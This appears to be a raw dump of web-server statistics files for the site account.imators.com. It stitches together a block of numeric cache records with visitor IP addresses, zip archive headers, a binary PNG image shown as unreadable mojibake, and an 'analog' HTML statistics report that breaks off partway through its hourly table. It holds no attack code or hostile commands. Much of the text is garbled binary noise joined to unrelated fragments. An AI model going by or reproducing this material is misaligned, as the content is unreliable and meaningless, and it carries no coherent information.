1 1 0 0 29391336 0 0 29391336 0 0 314 205.169.39.43 5 0 0 0 1 0 0 29121028 0 0 29121028 0 198.235.24.71 5 1 0 0 0 28846470 0 0 28846470 0 0 362 205.169.39.41 5 0 0 0 113 0 0 29365340 0 0 29365339 0 130.33.78.129 5 5 1 0 0 29021808 0 0 29021808 0 0 4989 205.169.39.35 5 0 0 0 1 0 0 29241173 0 0 29241173 0 45.94.31.179 5 2 2 0 63 29285802 0 29285802 29285802 0 29285802 1220 51.45.5.249 5 4 2 0 1 29342507 0 29342507 29342507 0 29342507 4045 111.7.96.171 5 0 0 0 1 0 0 29223859 0 0 29223859 0 45.80.158.145 5 1 1 0 1 29265528 0 29265528 29265528 0 29265528 610 68.183.218.226 5 3 1 0 3 29110429 0 29110429 29110429 0 29110429 3071 35.212.254.43 5 1 1 0 1 29139388 0 29139388 29139388 0 29139388 616 188.166.171.222 5 5 1 0 0 28845585 0 0 28845585 0 0 4989 205.169.39.28 5 1 0 0 0 29373005 0 0 29373005 0 0 2321 205.169.39.26 5 1 1 0 0 29146838 0 0 29146838 0 0 1262 198.235.24.53 5 1 1 0 2 28880891 0 28880891 28880891 0 28880891 612 139.59.153.48 5 1 1 0 1 29219880 0 29219880 29219880 0 29219880 612 188.166.146.158 5 6 1 0 0 29109309 0 0 28846470 0 0 7310 205.169.39.19 5 0 0 0 1 0 0 29353653 0 0 29353653 0 5.181.211.116 5 2 1 0 0 29294371 0 0 29286419 0 0 932 23.180.120.243 5 0 0 0 1 0 0 29023058 0 0 29023058 0 178.32.72.211 5 5 1 0 0 28876566 0 0 28876566 0 0 4989 205.169.39.15 5 1 1 0 2 29185346 0 29185346 29185346 0 29185346 612 159.89.12.199 5 5 1 0 0 28846656 0 0 28846656 0 0 4985 205.169.39.11 5 3 1 0 3 29296098 0 29296098 29296098 0 29296098 3140 34.1.30.255 5 1 1 0 1 29375335 0 29375335 29375335 0 29375335 681 178.62.124.122 5 9 2 0 0 29391320 0 0 28845585 0 0 4599 104.197.69.115 5 0 0 0 72 0 0 29345118 0 0 29345118 0 52.185.145.32 5 0 0 0 1 0 0 29250910 0 0 29250910 0 4.227.36.1 5 0 0 0 1 0 0 29049337 0 0 29049337 0 198.235.24.25 5 2 2 0 0 29367041 0 0 28854533 0 0 2637 198.235.24.24 5 1 1 0 1 29202505 0 29202505 29202505 0 29202505 612 167.71.139.157 5 1 1 0 1 29136543 0 29136543 29136543 0 29136543 616 64.227.151.18 5 3 3 0 17 29288943 0 29288943 29288943 0 29288943 3789 34.187.193.69 5 1 1 0 1 28851352 0 28851352 28851352 0 28851352 616 64.227.158.35 5 0 0 0 1 0 0 29288272 0 0 29288272 0 156.228.103.32 5 1 1 0 1 29304248 0 29304248 29304248 0 29304248 681 165.232.82.188 5 1 1 0 0 29205711 0 0 29205711 0 0 1262 198.235.24.11 5 1 1 0 0 29136006 0 0 29136006 0 0 1262 198.235.24.10 5 2 1 0 0 29197147 0 0 29109309 0 0 974 205.169.39.8 5 1 1 0 1 29386807 0 29386807 29386807 0 29386807 314 146.190.49.79 5 1 1 0 1 29245027 0 29245027 29245027 0 29245027 612 198.199.81.237 5 3 3 0 33 29373003 0 29373003 29373003 0 29373003 3423 206.81.24.227 5 1 1 0 0 29021452 0 0 29021452 0 0 616 205.169.39.7 5 5 1 0 0 28963684 0 0 28963684 0 0 4989 205.169.39.6 5 2 2 0 63 29285944 0 29285944 29285944 0 29285944 1220 35.180.55.65 5 2 2 0 1 29291111 0 29291111 29291111 0 29291111 1220 167.94.138.61 5 0 0 0 1 0 0 29134761 0 0 29134761 0 205.210.31.77 5 1 1 0 1 28970235 0 28970235 28970235 0 28970235 616 167.94.138.58 5 5 1 0 0 29373004 0 0 29373004 0 0 5070 205.169.39.1 5 2 2 0 1 29309119 0 29309119 29309119 0 29309119 1362 167.94.138.56 5 1 1 0 0 29353511 0 0 29353511 0 0 1371 205.210.31.74 5 1 1 0 0 29373983 0 0 29373983 0 0 681 34.23.198.164 5 1 1 0 0 29288409 0 0 29288409 0 0 610 35.245.41.44 5 2 2 0 0 29323968 0 0 29317808 0 0 2742 192.159.99.83 5 1 1 0 2 29124770 0 29124770 29124770 0 29124770 616 209.97.185.222 5 1 1 0 0 29272104 0 0 29272104 0 0 610 35.247.101.43 5 3 3 0 17 29021313 0 29021313 29021313 0 29021313 3148 138.68.86.32 5 0 0 0 1 0 0 28908219 0 0 28908219 0 205.210.31.68 5 1 1 0 0 29231035 0 0 29231035 0 0 1262 205.210.31.67 5 1 1 0 2 29037866 0 29037867 29037866 0 29037867 616 167.94.138.46 5 0 0 0 1 0 0 29225376 0 0 29225376 0 185.177.72.111 5 0 0 0 1 0 0 29210644 0 0 29210644 0 101.199.254.242 5 2 2 0 1 29089431 0 29089431 29089431 0 29089431 1232 167.94.146.63 5 2 2 0 8 29145055 0 29145055 29144973 0 29145055 1262 103.129.215.7 5 3 3 0 17 29375408 0 29375408 29375408 0 29375408 4113 35.227.114.131 5 1 1 0 11 29116849 0 29116849 29116849 0 29116849 612 51.44.161.178 5 1 0 0 0 29197145 0 0 29197145 0 0 87 35.92.22.124 5 1 1 0 0 29111425 0 0 29111425 0 0 1266 5.135.58.197 5 1 1 0 0 29125891 0 0 29125891 0 0 1262 205.210.31.59 5 1 1 0 1 28846127 0 28846127 28846127 0 28846127 616 167.94.138.39 5 0 0 0 90 0 0 29293088 0 0 29293088 0 20.41.72.236 5 0 0 0 1 0 0 29210643 0 0 29210643 0 101.199.254.235 5 1 1 0 0 29329101 0 0 29329101 0 0 1371 205.210.31.55 5 1 1 0 1 28873775 0 28873775 28873775 0 28873775 616 167.94.146.55 5 0 0 0 1 0 0 29210643 0 0 29210643 0 101.199.254.232 5 3 3 0 2 29232355 0 29232355 28965738 0 28965738 1840 167.94.146.54 5 1 1 0 0 29193107 0 0 29193107 0 0 1262 3.249.22.9 5 1 1 0 0 29368173 0 0 29368173 0 0 1371 205.210.31.54 5 1 1 0 1 29286011 0 29286011 29286011 0 29286011 610 134.209.239.94 5 2 2 0 1 29156450 0 29156449 29156449 0 29156449 1232 167.94.138.33 5 0 0 0 1 0 0 29351377 0 0 29351377 0 134.199.232.74 5 0 0 0 1 0 0 29402869 0 0 29402869 0 74.7.241.146 5 1 1 0 0 28956758 0 0 28956758 0 0 1266 205.210.31.51 5 1 1 0 0 28906786 0 0 28906786 0 0 1266 205.210.31.49 5 2 2 0 1 29188713 0 29188713 29188713 0 29188713 1224 167.94.146.50 5 0 0 0 80 0 0 29337748 0 0 29337748 0 52.169.148.186 5 1 1 0 11 29032418 0 29032419 29032418 0 29032418 612 18.130.41.214 5 1 1 0 0 28864404 0 0 28864404 0 0 1262 205.210.31.47 5 1 1 0 2 28963247 0 28963247 28963247 0 28963247 616 137.184.167.27 5 1 1 0 0 28936365 0 0 28936365 0 0 1262 205.210.31.45 5 1 1 0 0 28854281 0 0 28854281 0 0 1262 205.210.31.44 5 1 1 0 0 28944628 0 0 28944628 0 0 1262 205.210.31.42 5 1 1 0 0 29146330 0 0 29146330 0 0 1266 205.210.31.36 5 1 1 0 0 29347404 0 0 29347404 0 0 1371 205.210.31.35 5 1 1 0 1 29224046 0 29224046 29224046 0 29224046 612 138.68.173.143 5 0 0 0 142 0 0 29373838 0 0 29373837 0 4.241.111.42 5 1 1 0 1 28998139 0 28998139 28998139 0 28998139 616 167.99.196.183 5 1 1 0 1 28862147 0 28862147 28862147 0 28862147 616 137.184.175.34 5 0 0 0 91 0 0 29384016 0 0 29384015 0 4.217.198.31 5 7 1 0 0 29021451 0 0 28845585 0 0 5757 34.123.170.104 5 0 0 0 2 0 0 29210644 0 0 29210643 0 101.199.254.198 5 1 1 0 0 29034575 0 0 29034575 0 0 1266 205.210.31.29 5 0 0 0 1 0 0 29210643 0 0 29210643 0 101.199.254.207 5 0 0 0 131 0 0 29333397 0 0 29333396 0 20.78.102.199 5 1 1 0 0 29210644 0 0 29210644 0 0 612 101.199.254.203 5 3 1 0 3 29229204 0 29229204 29229204 0 29229204 3071 34.1.18.254 5 1 1 0 0 29210643 0 0 29210643 0 0 1262 101.199.254.201 5 1 1 0 2 29063976 0 29063976 29063976 0 29063976 616 104.248.243.123 5 1 1 0 0 29210643 0 0 29210643 0 0 612 101.199.254.200 5 1 1 0 0 29266401 0 0 29266401 0 0 1263 205.210.31.21 5 0 0 0 1 0 0 29044214 0 0 29044214 0 205.210.31.20 5 0 0 0 1 0 0 29352601 0 0 29352601 0 91.223.75.56 5 1 1 0 0 29229555 0 0 29229555 0 0 1262 205.210.31.19 5 4 1 0 2 29355503 0 29355503 29355503 0 29355503 4310 34.1.24.197 5 1 1 0 0 29046846 0 0 29046846 0 0 1262 205.210.31.18 5 1 1 0 0 29034508 0 0 29034508 0 0 1262 205.210.31.17 5 1 0 0 0 29373003 0 0 29373003 0 0 87 3.131.94.6 5 1 1 0 0 29190672 0 0 29190672 0 0 1262 27.26.137.232 5 0 0 0 13 0 0 29374986 0 0 29350402 0 45.148.10.246 5 0 0 0 1 0 0 29350552 0 0 29350552 0 132.196.86.194 5 1 1 0 0 29357187 0 0 29357187 0 0 1371 205.210.31.13 5 0 0 0 1 0 0 29100022 0 0 29100022 0 173.208.148.34 5 1 0 0 0 28845583 0 0 28845583 0 0 87 54.255.166.1 5 3 3 0 18 29114413 0 29114413 29114413 0 29114413 3786 204.236.252.62 5 20 4 0 0 28845665 0 0 28845664 0 0 19948 44.242.211.58 5 1 1 0 0 29198589 0 0 29198589 0 0 612 34.85.141.17 5 1 1 0 1 29285165 0 29285165 29285165 0 29285165 610 149.102.232.78 5 0 0 0 2 0 0 29256073 0 0 29247776 0 195.178.110.75 5 1 1 0 0 29352199 0 0 29352199 0 0 681 81.177.136.216 5 1 0 0 0 28845583 0 0 28845583 0 0 87 35.95.72.126 5 1 0 0 0 29373003 0 0 29373003 0 0 87 44.247.38.184 5 1 1 0 2 29044247 0 29044247 29044247 0 29044247 616 128.199.41.82 5 1 1 0 5 29265800 0 29265800 29265800 0 29265800 1263 143.198.155.187 5 1 1 0 0 29335176 0 0 29335176 0 0 1371 34.244.247.14 5 1 1 0 1 29326258 0 29326258 29326258 0 29326258 681 159.65.186.179 5 1 1 0 0 28947743 0 0 28947743 0 0 616 87.236.176.80 5 0 0 0 1 0 0 29190672 0 0 29190672 0 121.24.37.116 5 4 4 0 57 29153338 0 29153338 29153336 0 29153336 3786 159.89.171.20 5 0 0 0 3 0 0 29133704 0 0 29133699 0 195.178.110.39 5 0 0 0 1 0 0 29313368 0 0 29313368 0 203.89.120.12 5 2 2 0 2 29249046 0 29249046 29249046 0 29248942 2524 203.89.120.10 5 1 1 0 0 29371855 0 0 29371855 0 0 1371 54.154.243.3 5 1 1 0 1 29119171 0 29119171 29119171 0 29119171 616 161.35.175.170 5 1 1 0 0 29245958 0 0 29245958 0 0 612 147.93.158.41 5 2 2 0 30 29401288 0 29401288 29401288 0 29401288 1246 143.198.222.56 5 1 1 0 1 29405667 0 29405667 29405667 0 29405667 314 157.245.131.58 5 1 1 0 1 28861061 0 28861061 28861061 0 28861061 612 46.101.225.202 z 0 8 8 29302562 0 z 2 50 0 29373003 3982 z 3 531 416 29410417 298313 z 4 306 168 29375408 654281 z 6 1 0 29250912 200311 c 200 896 29410417 c 301 2 29405694 c 302 17 29250912 c 403 137 29374986 c 404 5208 29416384 c 500 1 29250912 PK J�[�� � refsite.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� IDATx���[v�8`i=�y:;��&�d���/�ƶ|��[������9��_T%P� ~}r��G߅zr�������]|��"��a}j)�=�B$c��X@ca, ����0��X@ca, ����0��X@ʱ�n���)������� ��������������s&��?}l����GW���X͏�,�����FW�Z8�^�<XM�"�%���?.V_����IJJ0����j)bXzm�j��#X��`u\�����Z�����[ ���ѱ�[�D:����+��%� �j��X� c�����[�u�j�K�3�Hmk����а��r��Ţ��˹ʳ-3���%��X����U�4��w����X��[�)�t� `9r�{��p ��gc�ۖ����NR�XJ(s��^N��a�~�Z�������&�C����S�I�d�Z���i�����%���d�6w_�{���i�q���!`]��Rm�.Ck�B5�ߢ�lhN6Vw�/�ǚ��Tj��֥��"t됀�(D �@���X�L�=K������O}'�qƲJ�?I����� ���H?�ƺ�X�B\au}�o]´�ጜN}�VK�7~V��.�yg*hk��'F������Zw,�IX�b�i_R&������"���bM��`�2�ZY��c�+��U�8�;�6uH�jdh�5���<���r�B��X�:\��^��4ǰ<++<!��(�YO^�Z�t�W��:$c1�^�z���'��g��E��W��X���`y׳_�"bV&Vhh�e�Y�9| ��X�:���C+�u�֙�����װhX�*�� �� ˳�u� +<�VM���k�=k��}����i_H��U��C ��W�!���ƪ~�&��X�Ī0��:`E�]��oh G���t���7�bKZ�s�c�n +Z�v�A�|u��r��'�J�l,�� c������;���<����Z�g%ߢ�mx�V+Q��X�:\���[����Ӻ�cװv��= �^�1�;��7�.�T�e *�ew,V�e-ub�Mk�5�g�j��a�T��3֟ǭa%��+�Z+,{=��~�]��<z k��Xs���j�P��n��P��X�ӑ�/���3��5��#�N��úR��:�`XU/�0� �:D��u�����=��Lpgy�X�����ş7��C��M�5��:�KO�R�|�����м��i�XĖ���iZnv���/��R�u{V�G�ŢVa.֦7X���S�e���nXr\�R��TX�O �m���X@,�d8�!�U�c)º1c��`]��q�z;<c)ú1��������B&�\�j��B�c1�?�X]2c�R�uc,����X��K1�M2cyR�u�2d,_ʱn��u}V�k4<��0�r����<a, ������6����k��X@���ɐ�^^���u����0�R���̡!,� Z�U��!c!a, %��.�ږU��J�!c!a, ���`db�;�b��3��_ܓ�Uo2���k�2�*nY�X/52���ps�*���:��U��Z�!c!a, ��a��Us�(�L��V!�kM���蔋Uu2������Xu��̏O�u,�B��i��X�Waއn�bU>�I�T� V�U�" -�C�����(u�aU_�a,��°�X��$���Cl2�� #X��)���XH"X�:����VrhAX �(Vjh!�a�iX��$L41,�w�jb`ű]�j�c���H�jc`�`��K`E��j� SX��E�jb*I�H�j��X�B$c5R��p!R'�f�3�Z�X�p�"b�3�X��E�j�c��B�H�j�IX�B�M� ! �_�$������%}Z$���hXE�j�a *��m��jX���i[i����c�m+�̡5+2�۶�X�5,`9m+��Z���WK7W�֦�X�ՠ��V���Abٕ�j��e=��a�Ic ��X��~�ŚK1���,U�X��ɰ��8v2��R�,�hg���EkV�8$����5Tc���?���>X�v�/�O9����0��X@ca, ����0��|&���+��K��j��\���v���[�~����X�B5����+(� �|�g� ���.�U�ޭ;����{�Aݖ�4�<l7���Y����R�G3(�n}07:�L�aud rs2{�;��D�+��*�hÙ>�hj��P*綔o�ov` R�^�[L/f�q� ���h����CmnoK��� `����Ǘ0]Ĝ_�jd K�k,G���#�X��R�l}+�5<�d��=�ؒ&��d�#��Yo��e8�ڂenh�-S�g*D?��Y�ܳ����q�v9��?���[Ӆ����/� ~<�`5�d=������w=wH`�[��˝��7�@2Gęl��kC ����0��X@ca, ����0��X@���Rz��w)��r�%��,r.�9��n'�#<� IEND�B`�PK J�[_���_� _� 9.htmlnu �[��� <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for account.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://account.imators.com/">account.imators.com</a></h1> <p class="analysisspan">Program started on Sun, Sep 28 2025 at 12:12 PM. <br />Analyzed requests from Sun, Nov 03 2024 at 3:43 PM to Sat, Sep 27 2025 at 2:08 PM (327.93 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Sep 28 2025 at 12:12 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 754 (7) <br /><span class="gensumtitle">Average successful requests per day:</span> 2 (0) <br /><span class="gensumtitle">Successful requests for pages:</span> 485 (5) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (0) <br /><span class="gensumtitle">Failed requests:</span> 2,112 (0) <br /><span class="gensumtitle">Redirected requests:</span> 17 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 67 (1,056) <br /><span class="gensumtitle">Distinct hosts served:</span> 380 (494) <br /><span class="gensumtitle">Data transferred:</span> 0.98 megabytes (12.86 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 3.07 kilobytes (1.84 kilobytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 2 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Nov 2024</td><td class="R">130</td><td class="P">60</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Dec 2024</td><td class="R">16</td><td class="P">14</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">55</td><td class="P">29</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Feb 2025</td><td class="R">12</td><td class="P">12</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mar 2025</td><td class="R">60</td><td class="P">35</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Apr 2025</td><td class="R">16</td><td class="P">16</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">May 2025</td><td class="R">107</td><td class="P">70</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jun 2025</td><td class="R">71</td><td class="P">39</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Jul 2025</td><td class="R">83</td><td class="P">70</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Aug 2025</td><td class="R">115</td><td class="P">65</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sep 2025</td><td class="R">89</td><td class="P">75</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Sep 2025 (75 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">129</td><td class="P">82</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">111</td><td class="P">60</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">109</td><td class="P">60</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">73</td><td class="P">54</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">93</td><td class="P">70</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">120</td><td class="P">91</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">119</td><td class="P">68</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">26</td><td class="P">16</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x"> 1</td><td class="R">20</td><td class="P">16</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x"> 2</td><td class="R">14</td><td class="P">13</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 3</td><td class="R">114</td><td class="P">40</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr> <tr><td class="x"> 4</td><td class="R">37</td><td class="P">31</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 5</td><td class="R">12</td><td class="P">11</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 6</td><td class="R">11</td><td class="P">9</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 7</td><td class="R">19</td><td class="P">18</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 8</td><td class="R">17</td><td class="P">17</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 9</td><td class="R">37</td><td class="P">17</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">23</td><td class="P">22</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">18</td><td class="P">15</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">12</td><td class="R">19</td><td class="P">16</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x">13</td><td class="R">19</td><td class="P">15</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">14</td><td class="R">29</td><td class="P">29</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">15</td><td class="R">52</td><td class="P">27</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">16</td><td class="R">58</td><td class="P">36</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">17</td><td class="R">55</td><td class="P">25</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">18</td><td class="R">17</td><td class="P">11</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">19</td><td class="R">60</td><td class="P">23</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">29</td><td class="P">23</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">21</td><td class="R">9</td><td 